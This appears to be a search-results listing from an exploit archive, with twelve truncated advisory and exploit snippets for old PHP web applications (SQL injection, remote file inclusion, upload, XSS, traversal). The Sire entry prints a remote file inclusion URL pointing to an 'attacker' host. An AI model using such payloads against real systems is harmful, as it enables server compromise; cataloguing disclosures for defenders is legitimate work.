12 matches found
Site@School <= 2.4.02 - Remote File Upload Exploit
No description provided by source. Title: Site@School 2.4.02 and below Multiple remote Command Execution Vulnerabilities Vendor: Site@School webiste : http://siteatschool.sourceforge.net/ Version : = 2.4.02 Severity: Critical Discovered by: Simo64 simo64atmorxorg Exploit writting by: Simo Ben...
Battle.net Clan Script for PHP 1.5.1 - Remote SQL Injection Vulnerability
No description provided by source. script : Battle.net Clan Script 1.5 file : login.php attack : injection sql auteur : h a c k e r X code : ------------------------------------------------------------------------------------------ line 9 -- $user = $POST'user'; line 10-- $pass = $POST'pass';...
Battle.net Clan Script for PHP 1.5.1 - SQL Injection
Battle.net Clan Script for PHP 1.5.1 - SQL Injection script : Battle.net Clan Script 1.5 file : login.php attack : injection sql auteur : h a c k e r X code : ------------------------------------------------------------------------------------------ line 9 -- $user = $POST'user'; line 10-- $pass ...
RamaCMS-adodb.txt
===================================================================== RamaCMS adodb.inc.php Remote File Inclue Vulnerability ===================================================================== Author : Le CoPrA ===================================================================== Download Scrip...
SiteSchool2.4.02.txt
Title: Site@School 2.4.02 and below Multiple remote Command Execution Vulnerabilities Vendor: Site@School webiste : http://siteatschool.sourceforge.net/ Version : Exploit writting by: Simo Ben youssef Discovered: 05 Aout 2006 Published : 15 September 2006 MorX Security Research Team...
phpQuiz <= 0.1.2 Remote SQL Injection / Code Execution Exploit
Exploit for unknown platform in category web applications ============================================================== phpQuiz Download File input name="image" type="file...
PHPMyRing <= 4.2.0 (view_com.php) Remote SQL Injection Exploit
No description provided by source. Title: PHPMyRing's viewcom.php Remote SQL injection Exploit Vendor: phpmyring webiste : http://phpmyring.sourceforge.net/ Version : = 4.2.0 Severity: Critical Discovered by: Simo64 simo64atmorxorg Exploit writting by: Simo Ben youssef simoatmorxorg Discovered: 0...
LinksCaffe30.txt
LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties Produce : LinksCaffe 3.0 Website : http://gonafish.com/ Impact : manupulation of data / system access Discovered by : Simo64 - Moroccan Security Team + SQL injection 1Vulnerable code in line 223 in links.php code : $rime =...
openGuestbook.txt
Produce : Open Guestbook 0.5 Site : http://sourceforge.net/projects/openguestbook Discovred by: Moroccan Security Team Simo64 Greetz to : And All Friends : Details : ========= +Cross Site Scripting -vulnerable code in header.php on line 5 1 2 3 4 5 -------------------- Exploit :...
Scout Portal Toolkit <= 1.4.0 (forumid) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl =============================================================== Scout Portal Toolkit 1.4.0 Remote SQL injection Exploit Coded By Simo64 Moroccan Security Research Team Specials thx to :Greetz : CiM-Team - CrAsHoVeRrIdE - dabdoub - damip - Darkbite...
Scry Gallery Directory Traversal & Full Path Disclosure Vulnerabilites
Software : Scry Gallery WebSite :http://scry.org/ discovred by :Moroccan Security Team + Directory Traversal : A remote attacker may employ directory traversal strings '../' to access arbitrary files outside of the webroot directory. This flaw is due to an input validation error in the "index.php...
Sire 2.0 - '/lire.php' Remote File Inclusion / Arbitrary File Upload
+File Inclusion: Input passed to the "rub" parameter in "lire.php" isn't properly verified, before it is used to include remote files Successful exploitation requires that "registerglobals" is enabled. lire.php code +Exploit: Exploit http://trajet/lire.php?rub=http://attacker&cahier=1&art=1...